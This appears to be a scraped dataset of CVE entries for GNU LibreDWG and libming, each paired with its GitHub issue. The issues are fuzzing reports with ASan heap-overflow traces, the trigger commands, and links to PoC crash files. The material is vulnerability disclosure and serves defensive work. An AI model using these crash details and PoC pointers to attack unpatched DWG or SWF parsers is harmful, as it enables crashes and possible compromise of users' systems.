Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6613
2020-01-08T21:15:11.537
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bit_search_sentinel in bits.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447025" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447025
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6614
2020-01-08T21:15:11.630
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bfr_read in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6615
2020-01-08T21:15:11.693
GNU LibreDWG 0.9.3.2564 has an invalid pointer dereference in dwg_dynapi_entity_value in dynapi.c (dynapi.c is generated by gen-dynapi.pl).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447223
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25Z
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
CVE-2020-6628
2020-01-09T02:15:13.433
Ming (aka libming) 0.4.8 has a heap-based buffer over-read in the function decompile_SWITCH() in decompile.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/191
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
export ASAN_OPTIONS=allocator_may_return_null=1 ./swftopython $poc [segmentaion_fault_decompile_569-use_after_free-idx:0x1365-0x2.zip](https://github.com/libming/libming/files/4028582/segmentaion_fault_decompile_569-use_after_free-idx.0x1365-0x2.zip) asan output ``` root@ubuntu:/home/tim/libming/util# export ASAN_OPTIONS=allocator_may_return_null=1 root@ubuntu:/home/tim/libming/util# ../../asan/libming/util/swftopython overflows/segmentaion_fault_decompile_569-use_after_free-idx\:0x1365-0x2 header indicates a filesize of 1484 but filesize is 228 #!/usr/bin/python from ming import * Ming_useSWFVersion(10); m = SWFMovie(); Ming_setScale(1.0); m.setRate(24.000000); m.setDimension(-9480, 8000); # SWF_PLACEOBJECT3 Failed to find branch target!!! Looking for: -2 ==95555==WARNING: AddressSanitizer failed to allocate 0xffffffffffffd438 bytes Stream out of sync after parse of blocktype 12 (SWF_DOACTION). 223 but expecting 200. # SWF_DOACTION ================================================================= ==95555==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61e000000b28 at pc 0x55bee29d8d4c bp 0x7fff67e356e0 sp 0x7fff67e356d0 READ of size 8 at 0x61e000000b28 thread T0 #0 0x55bee29d8d4b in decompile_SWITCH /home/tim/asan/libming/util/decompile.c:2104 #1 0x55bee29dba67 in decompileIF /home/tim/asan/libming/util/decompile.c:2594 #2 0x55bee29df98f in decompileAction /home/tim/asan/libming/util/decompile.c:3335 #3 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #4 0x55bee29df2da in decompileSETTARGET /home/tim/asan/libming/util/decompile.c:3169 #5 0x55bee29dfd4a in decompileAction /home/tim/asan/libming/util/decompile.c:3465 #6 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #7 0x55bee29dff50 in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #8 0x55bee29cbfd8 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #9 0x55bee29ce57e in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #10 0x55bee29cf674 in readMovie /home/tim/asan/libming/util/main.c:281 #11 0x55bee29cfe0e in main /home/tim/asan/libming/util/main.c:354 #12 0x7f3a8dc34b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) #13 0x55bee29c2469 in _start (/home/tim/asan/libming/util/swftopython+0x14469) 0x61e000000b28 is located 8 bytes to the right of 2720-byte region [0x61e000000080,0x61e000000b20) allocated by thread T0 here: #0 0x7f3a8e06f63e in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10c63e) #1 0x55bee29db912 in decompileIF /home/tim/asan/libming/util/decompile.c:2587 #2 0x55bee29df98f in decompileAction /home/tim/asan/libming/util/decompile.c:3335 #3 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #4 0x55bee29df2da in decompileSETTARGET /home/tim/asan/libming/util/decompile.c:3169 #5 0x55bee29dfd4a in decompileAction /home/tim/asan/libming/util/decompile.c:3465 #6 0x55bee29dfe1a in decompileActions /home/tim/asan/libming/util/decompile.c:3494 #7 0x55bee29dff50 in decompile5Action /home/tim/asan/libming/util/decompile.c:3517 #8 0x55bee29cbfd8 in outputSWF_DOACTION /home/tim/asan/libming/util/outputscript.c:1551 #9 0x55bee29ce57e in outputBlock /home/tim/asan/libming/util/outputscript.c:2083 #10 0x55bee29cf674 in readMovie /home/tim/asan/libming/util/main.c:281 #11 0x55bee29cfe0e in main /home/tim/asan/libming/util/main.c:354 #12 0x7f3a8dc34b6a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x26b6a) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/tim/asan/libming/util/decompile.c:2104 in decompile_SWITCH Shadow bytes around the buggy address: 0x0c3c7fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c3c7fff8150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c3c7fff8160: 00 00 00 00 fa[fa]fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3c7fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==95555==ABORTING root@ubuntu:/home/tim/libming/util# ```
heap overflow in decompile_SWITCH
https://api.github.com/repos/libming/libming/issues/191/comments
0
2020-01-07T01:51:41Z
2020-01-07T01:51:41Z
https://github.com/libming/libming/issues/191
546,033,507
191
CVE-2020-6629
2020-01-09T02:15:13.527
Ming (aka libming) 0.4.8 has z NULL pointer dereference in the function decompileGETURL2() in decompile.c.
